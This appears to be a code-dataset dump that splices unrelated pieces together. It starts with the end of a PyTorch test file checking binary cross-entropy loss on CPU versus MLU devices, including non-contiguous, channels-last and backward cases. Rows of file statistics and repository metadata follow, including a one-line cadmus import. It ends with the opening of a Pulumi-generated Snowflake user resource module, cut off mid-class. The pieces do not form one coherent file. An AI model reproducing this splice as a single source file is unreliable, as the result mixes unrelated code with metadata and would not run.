        # NOTE: (156) is the int 156, not a 1-tuple; torch.rand accepts it
        # as a 1-D size, so this covers the rank-1 case.
        shape_list = [(156), (2, 4, 6, 8), (527, 80), (32, 3, 14, 26)]
        reduct_lst = ["none", "mean", "sum"]
        # bce_loss python interface don't support short/half
        dtype_list = [(torch.float, 3e-3)]  # (dtype, MSE tolerance)
        weight_flag_list = [True, False]
        for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
            x = torch.rand(shape, dtype=torch.float).to(type_err[0])
            target = torch.rand(shape, dtype=torch.float).to(type_err[0])
            weight_orig = torch.rand(shape, dtype=torch.float).to(type_err[0])
            if weight_flag:
                weight_ = weight_orig
                weight_mlu = weight_orig.to("mlu")
            else:
                weight_ = None
                weight_mlu = None
            loss = nn.BCELoss(weight=weight_ if weight_flag else None, reduction=reduct)
            loss_mlu = nn.BCELoss(weight=weight_mlu if weight_flag else None,
                                  reduction=reduct)
            out_cpu = loss(x, target)
            out_mlu = loss_mlu(x.to("mlu"), target.to("mlu"))
            try:
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
                                        type_err[1], use_MSE=True)
            except AssertionError as e:
                # NOTE(review): mismatches are printed rather than failing the
                # test -- deliberate per the issue-303 TODO above (boundary
                # values can't currently be passed).
                print(e)

    # @unittest.skip("not test")
    @testinfo()
    def test_bce_not_dense(self):
        """Forward nn.BCELoss on non-contiguous (last-dim-sliced) tensors."""
        shape_list = [(2, 4, 6, 8), (527, 80), (32, 3, 14, 26)]
        reduct_lst = ["none", "mean", "sum"]
        # bce_loss python interface don't support short/half
        dtype_list = [(torch.float, 3e-3)]  # (dtype, MSE tolerance)
        weight_flag_list = [True, False]
        for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
            x = torch.rand(shape, dtype=torch.float).to(type_err[0])
            target = torch.rand(shape, dtype=torch.float).to(type_err[0])
            weight_orig = torch.rand(shape, dtype=torch.float).to(type_err[0])
            if weight_flag:
                # Slicing half of the last dim makes the tensors non-dense.
                weight_cpu = weight_orig[...,:int(shape[-1]/2)]
                weight_mlu = weight_orig.to("mlu")[...,:int(shape[-1]/2)]
            else:
                weight_cpu = None
                weight_mlu = None
            x_cpu = x[...,:int(shape[-1]/2)]
            x_mlu = x.to('mlu')[...,:int(shape[-1]/2)]
            target_cpu = target[...,:int(shape[-1]/2)]
            target_mlu = target.to('mlu')[...,:int(shape[-1]/2)]
            loss_cpu = nn.BCELoss(weight=weight_cpu if weight_flag else None, reduction=reduct)
            loss_mlu = nn.BCELoss(weight=weight_mlu if weight_flag else None,
                                  reduction=reduct)
            out_cpu = loss_cpu(x_cpu, target_cpu)
            out_mlu = loss_mlu(x_mlu, target_mlu)
            try:
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
                                        type_err[1], use_MSE=True)
            except AssertionError as e:
                # NOTE(review): printed, not failed -- see issue-303 TODO.
                print(e)

    # @unittest.skip("not test")
    @testinfo()
    def test_bce_channel_last(self):
        """Forward nn.BCELoss with channels-last input memory format."""
        shape_list = [(2, 4, 6, 8),(32, 3, 14, 26)]
        reduct_lst = ["none", "mean", "sum"]
        # bce_loss python interface don't support short/half
        dtype_list = [(torch.float, 3e-3)]  # (dtype, MSE tolerance)
        weight_flag_list = [True, False]
        for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
            x = torch.rand(shape, dtype=torch.float).to(type_err[0])
            target = torch.rand(shape, dtype=torch.float).to(type_err[0])
            weight_orig = torch.rand(shape, dtype=torch.float).to(type_err[0])
            if weight_flag:
                weight_cpu = weight_orig
                weight_mlu = weight_orig.to("mlu")
            else:
                weight_cpu = None
                weight_mlu = None
            # Only the input is converted to channels_last; target stays
            # contiguous, mixing memory formats on purpose.
            x_cpu = x.to(memory_format=torch.channels_last)
            x_mlu = x.to('mlu').to(memory_format=torch.channels_last)
            target_cpu = target
            target_mlu = target.to('mlu')
            loss_cpu = nn.BCELoss(weight=weight_cpu if weight_flag else None, reduction=reduct)
            loss_mlu = nn.BCELoss(weight=weight_mlu if weight_flag else None,
                                  reduction=reduct)
            out_cpu = loss_cpu(x_cpu, target_cpu)
            out_mlu = loss_mlu(x_mlu, target_mlu)
            try:
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
                                        type_err[1], use_MSE=True)
            except AssertionError as e:
                # NOTE(review): printed, not failed -- see issue-303 TODO.
                print(e)

    # @unittest.skip("not test")
    @testinfo()
    def test_bce_bp(self):
        """Backward (gradient) check for F.binary_cross_entropy."""
        shape_list = [(156), (2, 4, 6, 8), (527, 80), (32, 3, 14, 26)]
        reduct_lst = ["none", "mean", "sum"]
        dtype_list = [(torch.float, 3e-3)]  # (dtype, MSE tolerance)
        weight_flag_list = [True, False]
        for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
            x = torch.rand(shape, dtype=torch.float, requires_grad=True).to(type_err[0])
            target = torch.rand(shape, dtype=torch.float).to(type_err[0])
            weight = torch.rand(shape, dtype=torch.float).to(type_err[0])
            grad_in = torch.rand(shape, dtype=torch.float).to(type_err[0])
            grad_in_mlu = grad_in.to("mlu")
            if weight_flag:
                weight_ = weight
                weight_mlu = weight.to("mlu")
            else:
                weight_ = None
                weight_mlu = None
            out_cpu = F.binary_cross_entropy(x, target, reduction=reduct,
                                             weight=weight_)
            # reduction="none" yields a non-scalar output, so backward needs
            # an explicit incoming gradient.
            if reduct == "none":
                out_cpu.backward(grad_in)
            else:
                out_cpu.backward()
            grad_cpu = copy.deepcopy(x.grad)
            x.grad.zero_()
            # The MLU pass accumulates into the same leaf x.grad (the .to()
            # calls are non-leaf), hence the zero_() between passes.
            out_mlu = F.binary_cross_entropy(x.to("mlu"), target.to("mlu"),
                                             reduction=reduct,
                                             weight=weight_mlu)
            if reduct == "none":
                out_mlu.backward(grad_in_mlu)
            else:
                out_mlu.backward()
            grad_mlu = copy.deepcopy(x.grad)
            x.grad.zero_()
            self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
                                    type_err[1], use_MSE=True)
            self.assertTensorsEqual(grad_cpu.float(), grad_mlu.cpu().float(),
                                    type_err[1], use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_bce_bp_not_dense(self):
        """Backward check on non-contiguous (last-dim-sliced) tensors."""
        shape_list = [(2, 4, 6, 8), (527, 80), (32, 3, 14, 26)]
        reduct_lst = ["none", "mean", "sum"]
        dtype_list = [(torch.float, 3e-3)]  # (dtype, MSE tolerance)
        weight_flag_list = [True, False]
        for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
            x = torch.rand(shape, dtype=torch.float).to(type_err[0])
            target = torch.rand(shape, dtype=torch.float).to(type_err[0])
            weight = torch.rand(shape, dtype=torch.float).to(type_err[0])
            grad_in = torch.rand(shape, dtype=torch.float).to(type_err[0])[...,:int(shape[-1]/2)]
            grad_in_mlu = grad_in.to("mlu")[...,:int(shape[-1]/2)]
            if weight_flag:
                weight_cpu = weight[...,:int(shape[-1]/2)]
                weight_mlu = weight.to("mlu")[...,:int(shape[-1]/2)]
            else:
                weight_cpu = None
                weight_mlu = None
            # Here the sliced views themselves are the autograd leaves, so
            # CPU and MLU gradients live on separate tensors.
            x_cpu = x[...,:int(shape[-1]/2)].requires_grad_()
            x_mlu = x.to('mlu')[...,:int(shape[-1]/2)].requires_grad_()
            target_cpu = target[...,:int(shape[-1]/2)]
            target_mlu = target.to("mlu")[...,:int(shape[-1]/2)]
            out_cpu = F.binary_cross_entropy(x_cpu, target_cpu, reduction=reduct,
                                             weight=weight_cpu)
            if reduct == "none":
                out_cpu.backward(grad_in)
            else:
                out_cpu.backward()
            grad_cpu = copy.deepcopy(x_cpu.grad)
            x_cpu.grad.zero_()
            out_mlu = F.binary_cross_entropy(x_mlu, target_mlu,
                                             reduction=reduct,
                                             weight=weight_mlu)
            if reduct == "none":
                out_mlu.backward(grad_in_mlu)
            else:
                out_mlu.backward()
            grad_mlu = copy.deepcopy(x_mlu.grad)
            x_mlu.grad.zero_()
            self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
                                    type_err[1], use_MSE=True)
            self.assertTensorsEqual(grad_cpu.float(), grad_mlu.cpu().float(),
                                    type_err[1], use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_bce_bp_channel_last(self):
        """Backward check with channels-last input memory format."""
        shape_list = [(2, 4, 6, 8), (32, 3, 14, 26)]
        reduct_lst = ["none", "mean", "sum"]
        dtype_list = [(torch.float, 3e-3)]  # (dtype, MSE tolerance)
        weight_flag_list = [True, False]
        for shape, reduct, type_err, weight_flag in product(shape_list, reduct_lst, dtype_list, weight_flag_list):
            x = torch.rand(shape, dtype=torch.float).to(type_err[0])
            target = torch.rand(shape, dtype=torch.float).to(type_err[0])
            weight = torch.rand(shape, dtype=torch.float).to(type_err[0])
            grad_in = torch.rand(shape, dtype=torch.float).to(type_err[0])
            grad_in_mlu = grad_in.to("mlu")
            if weight_flag:
                weight_cpu = weight
                weight_mlu = weight.to("mlu")
            else:
                weight_cpu = None
                weight_mlu = None
            # The channels_last views are the autograd leaves here.
            x_cpu = x.to(memory_format=torch.channels_last).requires_grad_()
            x_mlu = x.to('mlu').to(memory_format=torch.channels_last).requires_grad_()
            # import pdb;pdb.set_trace()
            target_cpu = target
            target_mlu = target.to("mlu")
            out_cpu = F.binary_cross_entropy(x_cpu, target_cpu, reduction=reduct,
                                             weight=weight_cpu)
            if reduct == "none":
                out_cpu.backward(grad_in)
            else:
                out_cpu.backward()
            grad_cpu = copy.deepcopy(x_cpu.grad)
            x_cpu.grad.zero_()
            out_mlu = F.binary_cross_entropy(x_mlu, target_mlu,
                                             reduction=reduct,
                                             weight=weight_mlu)
            if reduct == "none":
                out_mlu.backward(grad_in_mlu)
            else:
                out_mlu.backward()
            grad_mlu = copy.deepcopy(x_mlu.grad)
            x_mlu.grad.zero_()
            self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(),
                                    type_err[1], use_MSE=True)
            self.assertTensorsEqual(grad_cpu.float(), grad_mlu.cpu().float(),
                                    type_err[1], use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_bce_exceptions(self):
        """Half-precision input must raise the documented RuntimeError on MLU."""
        shape = (1024, 256)
        reduct = "mean"
        dtype = torch.half
        x = torch.rand(shape, dtype=dtype, requires_grad=True)
        target = torch.rand(shape, dtype=dtype)
        weight = torch.rand(shape, dtype=dtype)
        grad_in = torch.rand(shape, dtype=dtype)
        grad_in_mlu = grad_in.to("mlu")
        weight_mlu = weight.to("mlu")
        grad_cpu = copy.deepcopy(x.grad)
        ref_msg = r"binary_cross_entropy not implemented for 'Half'"
        with self.assertRaisesRegex(RuntimeError, ref_msg):
            out_mlu = F.binary_cross_entropy(x.to("mlu"), target.to("mlu"),
                                             reduction=reduct,
                                             weight=weight_mlu)
            # Unreachable once the forward call raises; kept for symmetry
            # with the backward tests above.
            if reduct == "none":
                out_mlu.backward(grad_in_mlu)
            else:
                out_mlu.backward()
if __name__ == "__main__":
    # Allow running this file directly: python test_bce.py
    unittest.main()
| 46.835714 | 114 | 0.539347 | 1,637 | 13,114 | 4.08369 | 0.101405 | 0.037696 | 0.052356 | 0.071055 | 0.873448 | 0.859387 | 0.845325 | 0.816604 | 0.783396 | 0.775916 | 0 | 0.021847 | 0.336816 | 13,114 | 279 | 115 | 47.003584 | 0.746809 | 0.046363 | 0 | 0.74502 | 0 | 0 | 0.020661 | 0 | 0 | 0 | 0 | 0.003584 | 0.051793 | 1 | 0.027888 | false | 0 | 0.047809 | 0 | 0.079681 | 0.015936 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7bae59506199f8a1fc438d85da12e0c9ff88372d | 31 | py | Python | cadmus/fig/__init__.py | sthenic/cadmus | caeb8b2c86f404e3bde05ced1337bc2c4ecddb19 | [
"MIT"
] | 2 | 2017-08-04T15:01:28.000Z | 2020-05-15T11:40:25.000Z | cadmus/fig/__init__.py | sthenic/cadmus | caeb8b2c86f404e3bde05ced1337bc2c4ecddb19 | [
"MIT"
] | 5 | 2016-09-03T15:25:00.000Z | 2020-08-31T19:00:44.000Z | cadmus/fig/__init__.py | sthenic/cadmus | caeb8b2c86f404e3bde05ced1337bc2c4ecddb19 | [
"MIT"
] | 1 | 2020-01-03T09:37:13.000Z | 2020-01-03T09:37:13.000Z | from .generate import generate
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c87d189f871f67d152df2d3e325c9237bb616390 | 41,619 | py | Python | sdk/python/pulumi_snowflake/user.py | Hacker0x01/pulumi-snowflake | f6ebcf2c3f73b103a7c2001fae231998ce1323b2 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2021-07-01T17:03:33.000Z | 2022-03-01T19:29:04.000Z | sdk/python/pulumi_snowflake/user.py | Hacker0x01/pulumi-snowflake | f6ebcf2c3f73b103a7c2001fae231998ce1323b2 | [
"ECL-2.0",
"Apache-2.0"
] | 102 | 2021-07-14T13:12:58.000Z | 2022-03-31T18:34:04.000Z | sdk/python/pulumi_snowflake/user.py | Hacker0x01/pulumi-snowflake | f6ebcf2c3f73b103a7c2001fae231998ce1323b2 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2022-03-25T07:24:45.000Z | 2022-03-25T07:24:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['UserArgs', 'User']
@pulumi.input_type
class UserArgs:
    """Typed bundle of input properties for constructing a ``User`` resource."""

    def __init__(__self__, *,
                 comment: Optional[pulumi.Input[str]] = None,
                 default_namespace: Optional[pulumi.Input[str]] = None,
                 default_role: Optional[pulumi.Input[str]] = None,
                 default_warehouse: Optional[pulumi.Input[str]] = None,
                 disabled: Optional[pulumi.Input[bool]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 email: Optional[pulumi.Input[str]] = None,
                 first_name: Optional[pulumi.Input[str]] = None,
                 last_name: Optional[pulumi.Input[str]] = None,
                 login_name: Optional[pulumi.Input[str]] = None,
                 must_change_password: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 rsa_public_key: Optional[pulumi.Input[str]] = None,
                 rsa_public_key2: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]] = None):
        """
        The set of arguments for constructing a User resource.
        :param pulumi.Input[str] default_namespace: Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
        :param pulumi.Input[str] default_role: Specifies the role that is active by default for the user’s session upon login.
        :param pulumi.Input[str] default_warehouse: Specifies the virtual warehouse that is active by default for the user’s session upon login.
        :param pulumi.Input[str] display_name: Name displayed for the user in the Snowflake web interface.
        :param pulumi.Input[str] email: Email address for the user.
        :param pulumi.Input[str] first_name: First name of the user.
        :param pulumi.Input[str] last_name: Last name of the user.
        :param pulumi.Input[str] login_name: The name users use to log in. If not supplied, snowflake will use name instead.
        :param pulumi.Input[bool] must_change_password: Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
        :param pulumi.Input[str] name: Name of the user. Note that if you do not supply login_name this will be used as login_name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
        :param pulumi.Input[str] password: **WARNING:** this will put the password in the terraform state file. Use carefully.
        :param pulumi.Input[str] rsa_public_key: Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
        :param pulumi.Input[str] rsa_public_key2: Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
        :param pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]] tags: Definitions of a tag to associate with the resource.
        """
        # Only record arguments that were explicitly supplied (non-None);
        # pulumi.set stores each value under its snake_case key.
        if comment is not None:
            pulumi.set(__self__, "comment", comment)
        if default_namespace is not None:
            pulumi.set(__self__, "default_namespace", default_namespace)
        if default_role is not None:
            pulumi.set(__self__, "default_role", default_role)
        if default_warehouse is not None:
            pulumi.set(__self__, "default_warehouse", default_warehouse)
        if disabled is not None:
            pulumi.set(__self__, "disabled", disabled)
        if display_name is not None:
            pulumi.set(__self__, "display_name", display_name)
        if email is not None:
            pulumi.set(__self__, "email", email)
        if first_name is not None:
            pulumi.set(__self__, "first_name", first_name)
        if last_name is not None:
            pulumi.set(__self__, "last_name", last_name)
        if login_name is not None:
            pulumi.set(__self__, "login_name", login_name)
        if must_change_password is not None:
            pulumi.set(__self__, "must_change_password", must_change_password)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if rsa_public_key is not None:
            pulumi.set(__self__, "rsa_public_key", rsa_public_key)
        if rsa_public_key2 is not None:
            pulumi.set(__self__, "rsa_public_key2", rsa_public_key2)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter
    def comment(self) -> Optional[pulumi.Input[str]]:
        """The ``comment`` input value, if one was supplied."""
        return pulumi.get(self, "comment")

    @comment.setter
    def comment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "comment", value)

    @property
    @pulumi.getter(name="defaultNamespace")
    def default_namespace(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
        """
        return pulumi.get(self, "default_namespace")

    @default_namespace.setter
    def default_namespace(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "default_namespace", value)

    @property
    @pulumi.getter(name="defaultRole")
    def default_role(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the role that is active by default for the user’s session upon login.
        """
        return pulumi.get(self, "default_role")

    @default_role.setter
    def default_role(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "default_role", value)

    @property
    @pulumi.getter(name="defaultWarehouse")
    def default_warehouse(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the virtual warehouse that is active by default for the user’s session upon login.
        """
        return pulumi.get(self, "default_warehouse")

    @default_warehouse.setter
    def default_warehouse(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "default_warehouse", value)

    @property
    @pulumi.getter
    def disabled(self) -> Optional[pulumi.Input[bool]]:
        """The ``disabled`` input value, if one was supplied."""
        return pulumi.get(self, "disabled")

    @disabled.setter
    def disabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "disabled", value)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        Name displayed for the user in the Snowflake web interface.
        """
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)

    @property
    @pulumi.getter
    def email(self) -> Optional[pulumi.Input[str]]:
        """
        Email address for the user.
        """
        return pulumi.get(self, "email")

    @email.setter
    def email(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "email", value)

    @property
    @pulumi.getter(name="firstName")
    def first_name(self) -> Optional[pulumi.Input[str]]:
        """
        First name of the user.
        """
        return pulumi.get(self, "first_name")

    @first_name.setter
    def first_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "first_name", value)

    @property
    @pulumi.getter(name="lastName")
    def last_name(self) -> Optional[pulumi.Input[str]]:
        """
        Last name of the user.
        """
        return pulumi.get(self, "last_name")

    @last_name.setter
    def last_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "last_name", value)

    @property
    @pulumi.getter(name="loginName")
    def login_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name users use to log in. If not supplied, snowflake will use name instead.
        """
        return pulumi.get(self, "login_name")

    @login_name.setter
    def login_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "login_name", value)

    @property
    @pulumi.getter(name="mustChangePassword")
    def must_change_password(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
        """
        return pulumi.get(self, "must_change_password")

    @must_change_password.setter
    def must_change_password(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "must_change_password", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the user. Note that if you do not supply login_name this will be used as login_name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        **WARNING:** this will put the password in the terraform state file. Use carefully.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="rsaPublicKey")
    def rsa_public_key(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
        """
        return pulumi.get(self, "rsa_public_key")

    @rsa_public_key.setter
    def rsa_public_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "rsa_public_key", value)

    @property
    @pulumi.getter(name="rsaPublicKey2")
    def rsa_public_key2(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
        """
        return pulumi.get(self, "rsa_public_key2")

    @rsa_public_key2.setter
    def rsa_public_key2(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "rsa_public_key2", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]]:
        """
        Definitions of a tag to associate with the resource.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]]):
        pulumi.set(self, "tags", value)
@pulumi.input_type
class _UserState:
    """State bundle used when looking up / filtering existing ``User`` resources.

    Identical to :class:`UserArgs` plus the output-only ``has_rsa_public_key``.
    """

    def __init__(__self__, *,
                 comment: Optional[pulumi.Input[str]] = None,
                 default_namespace: Optional[pulumi.Input[str]] = None,
                 default_role: Optional[pulumi.Input[str]] = None,
                 default_warehouse: Optional[pulumi.Input[str]] = None,
                 disabled: Optional[pulumi.Input[bool]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 email: Optional[pulumi.Input[str]] = None,
                 first_name: Optional[pulumi.Input[str]] = None,
                 has_rsa_public_key: Optional[pulumi.Input[bool]] = None,
                 last_name: Optional[pulumi.Input[str]] = None,
                 login_name: Optional[pulumi.Input[str]] = None,
                 must_change_password: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 rsa_public_key: Optional[pulumi.Input[str]] = None,
                 rsa_public_key2: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]] = None):
        """
        Input properties used for looking up and filtering User resources.
        :param pulumi.Input[str] default_namespace: Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
        :param pulumi.Input[str] default_role: Specifies the role that is active by default for the user’s session upon login.
        :param pulumi.Input[str] default_warehouse: Specifies the virtual warehouse that is active by default for the user’s session upon login.
        :param pulumi.Input[str] display_name: Name displayed for the user in the Snowflake web interface.
        :param pulumi.Input[str] email: Email address for the user.
        :param pulumi.Input[str] first_name: First name of the user.
        :param pulumi.Input[bool] has_rsa_public_key: Will be true if user has an RSA key set.
        :param pulumi.Input[str] last_name: Last name of the user.
        :param pulumi.Input[str] login_name: The name users use to log in. If not supplied, snowflake will use name instead.
        :param pulumi.Input[bool] must_change_password: Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
        :param pulumi.Input[str] name: Name of the user. Note that if you do not supply login_name this will be used as login_name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
        :param pulumi.Input[str] password: **WARNING:** this will put the password in the terraform state file. Use carefully.
        :param pulumi.Input[str] rsa_public_key: Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
        :param pulumi.Input[str] rsa_public_key2: Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
        :param pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]] tags: Definitions of a tag to associate with the resource.
        """
        # Only record explicitly supplied (non-None) values.
        if comment is not None:
            pulumi.set(__self__, "comment", comment)
        if default_namespace is not None:
            pulumi.set(__self__, "default_namespace", default_namespace)
        if default_role is not None:
            pulumi.set(__self__, "default_role", default_role)
        if default_warehouse is not None:
            pulumi.set(__self__, "default_warehouse", default_warehouse)
        if disabled is not None:
            pulumi.set(__self__, "disabled", disabled)
        if display_name is not None:
            pulumi.set(__self__, "display_name", display_name)
        if email is not None:
            pulumi.set(__self__, "email", email)
        if first_name is not None:
            pulumi.set(__self__, "first_name", first_name)
        if has_rsa_public_key is not None:
            pulumi.set(__self__, "has_rsa_public_key", has_rsa_public_key)
        if last_name is not None:
            pulumi.set(__self__, "last_name", last_name)
        if login_name is not None:
            pulumi.set(__self__, "login_name", login_name)
        if must_change_password is not None:
            pulumi.set(__self__, "must_change_password", must_change_password)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if rsa_public_key is not None:
            pulumi.set(__self__, "rsa_public_key", rsa_public_key)
        if rsa_public_key2 is not None:
            pulumi.set(__self__, "rsa_public_key2", rsa_public_key2)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter
    def comment(self) -> Optional[pulumi.Input[str]]:
        """The ``comment`` state value, if one was supplied."""
        return pulumi.get(self, "comment")

    @comment.setter
    def comment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "comment", value)

    @property
    @pulumi.getter(name="defaultNamespace")
    def default_namespace(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
        """
        return pulumi.get(self, "default_namespace")

    @default_namespace.setter
    def default_namespace(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "default_namespace", value)

    @property
    @pulumi.getter(name="defaultRole")
    def default_role(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the role that is active by default for the user’s session upon login.
        """
        return pulumi.get(self, "default_role")

    @default_role.setter
    def default_role(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "default_role", value)

    @property
    @pulumi.getter(name="defaultWarehouse")
    def default_warehouse(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the virtual warehouse that is active by default for the user’s session upon login.
        """
        return pulumi.get(self, "default_warehouse")

    @default_warehouse.setter
    def default_warehouse(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "default_warehouse", value)

    @property
    @pulumi.getter
    def disabled(self) -> Optional[pulumi.Input[bool]]:
        """The ``disabled`` state value, if one was supplied."""
        return pulumi.get(self, "disabled")

    @disabled.setter
    def disabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "disabled", value)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        Name displayed for the user in the Snowflake web interface.
        """
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)

    @property
    @pulumi.getter
    def email(self) -> Optional[pulumi.Input[str]]:
        """
        Email address for the user.
        """
        return pulumi.get(self, "email")

    @email.setter
    def email(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "email", value)

    @property
    @pulumi.getter(name="firstName")
    def first_name(self) -> Optional[pulumi.Input[str]]:
        """
        First name of the user.
        """
        return pulumi.get(self, "first_name")

    @first_name.setter
    def first_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "first_name", value)

    @property
    @pulumi.getter(name="hasRsaPublicKey")
    def has_rsa_public_key(self) -> Optional[pulumi.Input[bool]]:
        """
        Will be true if user has an RSA key set.
        """
        return pulumi.get(self, "has_rsa_public_key")

    @has_rsa_public_key.setter
    def has_rsa_public_key(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "has_rsa_public_key", value)

    @property
    @pulumi.getter(name="lastName")
    def last_name(self) -> Optional[pulumi.Input[str]]:
        """
        Last name of the user.
        """
